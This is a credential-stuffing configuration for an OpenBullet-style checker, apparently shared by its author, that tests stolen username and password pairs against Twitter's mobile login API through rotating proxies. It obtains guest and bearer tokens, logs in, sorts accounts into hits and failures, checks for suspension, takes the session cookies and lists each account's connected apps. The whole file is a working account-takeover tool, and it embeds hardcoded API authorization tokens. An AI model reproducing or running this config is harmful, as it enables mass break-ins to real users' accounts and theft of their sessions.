[SETTINGS]
{
  "Name": "TWITTER WEB",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-17T13:09:10.3949577+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "TWITTER WEB",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#USER FUNCTION URLEncode "<USER>" -> VAR "USER" 

#PASS FUNCTION URLEncode "<PASS>" -> VAR "PASS" 

#Hash FUNCTION RandomString "?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "1" 

#Hash3 FUNCTION GenerateGUID -> VAR "2" 

#UA FUNCTION GetRandomUA -> VAR "UA" 

#1 REQUEST POST "https://api.twitter.com/oauth2/token" 
  CONTENT "grant_type=client_credentials" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Cache-Control: no-store" 
  HEADER "X-B3-TraceId: <1>" 
  HEADER "OS-Security-Patch-Level: 2017-10-05" 
  HEADER "X-Twitter-Client-Flavor: " 
  HEADER "User-Agent: TwitterAndroid/8.95.0-release.00 (28950000-r-0) A5010/7.1.2 (OnePlus;A5010;OnePlus;A5010;0;;1;2013)" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Twitter-Client-AdID: <2>" 
  HEADER "Timezone: Asia/Shanghai" 
  HEADER "X-Twitter-Client-Limit-Ad-Tracking: 0" 
  HEADER "X-Twitter-Client: TwitterAndroid" 
  HEADER "X-Twitter-Client-Language: en-US" 
  HEADER "X-Twitter-Client-DeviceID: <1>" 
  HEADER "X-Twitter-API-Version: 5" 
  HEADER "Optimize-Body: true" 
  HEADER "X-Twitter-Active-User: no" 
  HEADER "X-Twitter-Client-Version: 8.95.0-release.00" 
  HEADER "X-Client-UUID: <2>" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: Basic M25WdVNvQlpueDZVNHZ6VXhmNXc6QmNzNTlFRmJic2RGNlNsOU5nNzFzbWdTdFdFR3dYWEtTall2UFZ0N3F5cw==" 
  HEADER "Accept-Language: en-US" 
  HEADER "Host: api.twitter.com" 
  HEADER "Connection: keep-alive" 

#ATK PARSE "<SOURCE>" JSON "access_token" -> VAR "ATK" 

#2 REQUEST POST "https://api.twitter.com/1.1/guest/activate.json" 
  CONTENT "" 
  CONTENTTYPE "text/plain" 
  HEADER "Cache-Control: no-store" 
  HEADER "X-B3-TraceId: <1>" 
  HEADER "OS-Security-Patch-Level: 2017-10-05" 
  HEADER "X-Twitter-Client-Flavor: " 
  HEADER "User-Agent: <UA>" 
  HEADER "X-Twitter-Client-AdID: <2>" 
  HEADER "Timezone: Asia/Shanghai" 
  HEADER "X-Twitter-Client-Limit-Ad-Tracking: 0" 
  HEADER "X-Twitter-Client: TwitterAndroid" 
  HEADER "X-Twitter-Client-Language: en-US" 
  HEADER "X-Twitter-Client-DeviceID: <1>" 
  HEADER "X-Twitter-API-Version: 5" 
  HEADER "Optimize-Body: true" 
  HEADER "X-Twitter-Active-User: no" 
  HEADER "X-Twitter-Client-Version: 8.95.0-release.00" 
  HEADER "X-Client-UUID: <2>" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: Bearer <ATK>" 
  HEADER "Accept-Language: en-US" 
  HEADER "Host: api.twitter.com" 
  HEADER "Connection: keep-alive" 

#GUEST PARSE "<SOURCE>" JSON "guest_token" -> VAR "GUEST" 

#LOGIN REQUEST POST "https://api.twitter.com/auth/1/xauth_password.json" 
  CONTENT "x_auth_identifier=<USER>&x_auth_password=<PASS>&send_error_codes=true&x_auth_login_challenge=1&x_auth_login_verification=1&ui_metrics=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Cache-Control: no-store" 
  HEADER "X-B3-TraceId: <1>" 
  HEADER "OS-Security-Patch-Level: 2017-10-05" 
  HEADER "X-Twitter-Client-Flavor: " 
  HEADER "User-Agent: TwitterAndroid/8.95.0-release.00 (28950000-r-0) A5010/7.1.2 (OnePlus;A5010;OnePlus;A5010;0;;1;2013)" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Twitter-Client-AdID: <2>" 
  HEADER "Timezone: Asia/Shanghai" 
  HEADER "X-Twitter-Client-Limit-Ad-Tracking: 0" 
  HEADER "X-Twitter-Client: TwitterAndroid" 
  HEADER "X-Twitter-Client-Language: en-US" 
  HEADER "X-Twitter-Client-DeviceID: <1>" 
  HEADER "X-Twitter-API-Version: 5" 
  HEADER "Optimize-Body: true" 
  HEADER "X-Twitter-Active-User: yes" 
  HEADER "X-Twitter-Client-Version: 8.95.0-release.00" 
  HEADER "X-Guest-Token: <GUEST>" 
  HEADER "X-Client-UUID: <2>" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: Bearer <ATK>" 
  HEADER "Accept-Language: en-US" 
  HEADER "Host: api.twitter.com" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Could not authenticate you" 
    KEY "x_auth_identifier parameter is missing" 
    KEY "auth_password parameter is missing" 
  KEYCHAIN Success OR 
    KEY "oauth_token" 
    KEY "{\"login_verification_request_id" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "We found more than one account with that phone number. Please try again with your username or email" 
    KEY "User is over the limit for login attempts. Please try again in an hour" 

#USERNAME PARSE "<SOURCE>" JSON "screen_name" CreateEmpty=FALSE -> CAP "USERNAME" "👾" "👾" 

REQUEST GET "https://api.twitter.com/graphql/P8ph10GzBbdMqWZxulqCfA/UserByScreenName?variables=%7B%22screen_name%22%3A%22<Username>%22%2C%22withHighlightedLabel%22%3Atrue%7D" 
  
  HEADER "authorization: Bearer <ATK>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "User has been suspended" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "User has been suspended" 

REQUEST GET "https://twitter.com/settings/connected_apps" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES(auth_token)>" LR "" "" -> VAR "TT" 

PARSE "<COOKIES(ct0)>" LR "" "" -> VAR "CT" 

REQUEST GET "https://twitter.com/i/api/1.1/oauth/list.json" 
  
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "authorization: Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%HKoQE36HtLF5197bKMEQxNCRg85tBk5mcLUj99nPoxTR" 
  HEADER "cookie: auth_token=<TT>; ct0=<CT>" 
  HEADER "referer: https://twitter.com/settings/connected_apps" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 
  HEADER "x-csrf-token: <CT>" 
  HEADER "x-twitter-active-user: yes" 
  HEADER "x-twitter-auth-type: OAuth2Session" 
  HEADER "x-twitter-client-language: en" 

PARSE "<SOURCE>" LR "\",\"name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Apps" 

#AUTHOR FUNCTION Constant "@uzzzul" -> CAP "CONFIG BY" 

